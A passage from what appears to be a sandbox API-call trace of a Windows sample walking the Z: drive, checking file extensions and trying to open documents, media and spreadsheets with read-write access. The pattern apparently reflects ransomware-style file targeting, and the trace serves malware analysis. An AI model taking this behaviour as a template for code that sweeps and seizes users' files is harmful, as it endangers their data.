ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16e80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OpdqDACZhn.ots", cAlternateFileName="")) returned 1 [0181.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.245] PathFindExtensionW (pszPath="Z:\\OpdqDACZhn.ots") returned=".ots" [0181.250] CreateFileW (lpFileName="Z:\\OpdqDACZhn.ots" (normalized: "z:\\opdqdaczhn.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.252] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16ba0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxTfgN.jpg", cAlternateFileName="")) returned 1 [0181.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.252] PathFindExtensionW (pszPath="Z:\\xxTfgN.jpg") returned=".jpg" [0181.256] CreateFileW (lpFileName="Z:\\xxTfgN.jpg" (normalized: "z:\\xxtfgn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.258] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaeb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1HtpGhRDb.ots", cAlternateFileName="")) returned 1 [0181.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.258] PathFindExtensionW (pszPath="Z:\\1HtpGhRDb.ots") returned=".ots" [0181.262] CreateFileW (lpFileName="Z:\\1HtpGhRDb.ots" (normalized: "z:\\1htpghrdb.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.263] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tE4nVH8Z0MXjyxhaHaNx.pdf", cAlternateFileName="")) returned 1 [0181.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.263] PathFindExtensionW (pszPath="Z:\\tE4nVH8Z0MXjyxhaHaNx.pdf") returned=".pdf" [0181.268] CreateFileW (lpFileName="Z:\\tE4nVH8Z0MXjyxhaHaNx.pdf" (normalized: "z:\\te4nvh8z0mxjyxhahanx.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.269] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11d7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IBowTJ.csv", cAlternateFileName="")) returned 1 [0181.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.269] PathFindExtensionW (pszPath="Z:\\IBowTJ.csv") returned=".csv" [0181.273] CreateFileW (lpFileName="Z:\\IBowTJ.csv" (normalized: "z:\\ibowtj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.275] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9776, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CAYEd2GbRKcU4.jpg", cAlternateFileName="")) returned 1 [0181.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.275] PathFindExtensionW (pszPath="Z:\\CAYEd2GbRKcU4.jpg") returned=".jpg" [0181.279] CreateFileW (lpFileName="Z:\\CAYEd2GbRKcU4.jpg" (normalized: "z:\\cayed2gbrkcu4.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.280] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb6a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FPTqG3qP.ots", cAlternateFileName="")) returned 1 [0181.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.281] PathFindExtensionW (pszPath="Z:\\FPTqG3qP.ots") returned=".ots" [0181.285] CreateFileW (lpFileName="Z:\\FPTqG3qP.ots" (normalized: "z:\\fptqg3qp.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.286] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2cHgIoncB.wav", cAlternateFileName="")) returned 1 [0181.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.286] PathFindExtensionW (pszPath="Z:\\2cHgIoncB.wav") returned=".wav" [0181.290] CreateFileW (lpFileName="Z:\\2cHgIoncB.wav" (normalized: "z:\\2chgioncb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.292] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15b5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BrKxpbhKKRTpU.docx", cAlternateFileName="")) returned 1 [0181.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.292] PathFindExtensionW (pszPath="Z:\\BrKxpbhKKRTpU.docx") returned=".docx" [0181.296] CreateFileW (lpFileName="Z:\\BrKxpbhKKRTpU.docx" (normalized: "z:\\brkxpbhkkrtpu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.298] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14c86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8AEDnDa.avi", cAlternateFileName="")) returned 1 [0181.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.298] PathFindExtensionW (pszPath="Z:\\8AEDnDa.avi") returned=".avi" [0181.302] CreateFileW (lpFileName="Z:\\8AEDnDa.avi" (normalized: "z:\\8aednda.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.304] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12e32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fmkPuhgsIQDpQcV3y.ppt", cAlternateFileName="")) returned 1 [0181.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.304] PathFindExtensionW (pszPath="Z:\\fmkPuhgsIQDpQcV3y.ppt") returned=".ppt" [0181.308] CreateFileW (lpFileName="Z:\\fmkPuhgsIQDpQcV3y.ppt" (normalized: "z:\\fmkpuhgsiqdpqcv3y.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.309] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17bcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oul9aMfiTm6Pt28KJ.xls", cAlternateFileName="")) returned 1 [0181.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.309] PathFindExtensionW (pszPath="Z:\\Oul9aMfiTm6Pt28KJ.xls") returned=".xls" [0181.314] CreateFileW (lpFileName="Z:\\Oul9aMfiTm6Pt28KJ.xls" (normalized: "z:\\oul9amfitm6pt28kj.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.315] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x145e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cdbHKY8ircatAsd.mp3", cAlternateFileName="")) returned 1 [0181.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.315] PathFindExtensionW (pszPath="Z:\\cdbHKY8ircatAsd.mp3") returned=".mp3" [0181.319] CreateFileW (lpFileName="Z:\\cdbHKY8ircatAsd.mp3" (normalized: "z:\\cdbhky8ircatasd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.321] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5a54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EInIzXIEURKe2P.odt", cAlternateFileName="")) returned 1 [0181.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.321] PathFindExtensionW (pszPath="Z:\\EInIzXIEURKe2P.odt") returned=".odt" [0181.325] CreateFileW (lpFileName="Z:\\EInIzXIEURKe2P.odt" (normalized: "z:\\einizxieurke2p.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.326] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfc2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WDBM7MBYaR.mp3", cAlternateFileName="")) returned 1 [0181.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.326] PathFindExtensionW (pszPath="Z:\\WDBM7MBYaR.mp3") returned=".mp3" [0181.330] CreateFileW (lpFileName="Z:\\WDBM7MBYaR.mp3" (normalized: "z:\\wdbm7mbyar.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.332] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6tY3yjB6Dh6qgWl.odp", cAlternateFileName="")) returned 1 [0181.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.332] PathFindExtensionW (pszPath="Z:\\s6tY3yjB6Dh6qgWl.odp") returned=".odp" [0181.336] CreateFileW (lpFileName="Z:\\s6tY3yjB6Dh6qgWl.odp" (normalized: "z:\\s6ty3yjb6dh6qgwl.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.337] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17be7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UrfjPtip.xlsx", cAlternateFileName="")) returned 1 [0181.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.337] PathFindExtensionW (pszPath="Z:\\UrfjPtip.xlsx") returned=".xlsx" [0181.343] CreateFileW (lpFileName="Z:\\UrfjPtip.xlsx" (normalized: "z:\\urfjptip.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.345] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbcf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qllIIB4PUCq.m4a", cAlternateFileName="")) returned 1 [0181.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.345] PathFindExtensionW (pszPath="Z:\\qllIIB4PUCq.m4a") returned=".m4a" [0181.349] CreateFileW (lpFileName="Z:\\qllIIB4PUCq.m4a" (normalized: "z:\\qlliib4pucq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.350] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd729, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ry23qi7rroS58F.m4a", cAlternateFileName="")) returned 1 [0181.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.350] PathFindExtensionW (pszPath="Z:\\ry23qi7rroS58F.m4a") returned=".m4a" [0181.354] CreateFileW (lpFileName="Z:\\ry23qi7rroS58F.m4a" (normalized: "z:\\ry23qi7rros58f.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.361] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11d82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zl76M0AJ2xe.ppt", cAlternateFileName="")) returned 1 [0181.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.361] PathFindExtensionW (pszPath="Z:\\zl76M0AJ2xe.ppt") returned=".ppt" [0181.366] CreateFileW (lpFileName="Z:\\zl76M0AJ2xe.ppt" (normalized: "z:\\zl76m0aj2xe.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.368] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kiZ0JG9WrlZl.ppt", cAlternateFileName="")) returned 1 [0181.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.368] PathFindExtensionW (pszPath="Z:\\kiZ0JG9WrlZl.ppt") returned=".ppt" [0181.375] CreateFileW (lpFileName="Z:\\kiZ0JG9WrlZl.ppt" (normalized: "z:\\kiz0jg9wrlzl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.376] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="byUWhwwpU4G7YhqN.png", cAlternateFileName="")) returned 1 [0181.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.376] PathFindExtensionW (pszPath="Z:\\byUWhwwpU4G7YhqN.png") returned=".png" [0181.381] CreateFileW (lpFileName="Z:\\byUWhwwpU4G7YhqN.png" (normalized: "z:\\byuwhwwpu4g7yhqn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.383] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13665, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3lJ1cmsj7wnHDKlL1.xls", cAlternateFileName="")) returned 1 [0181.383] RtlAllocateHeap 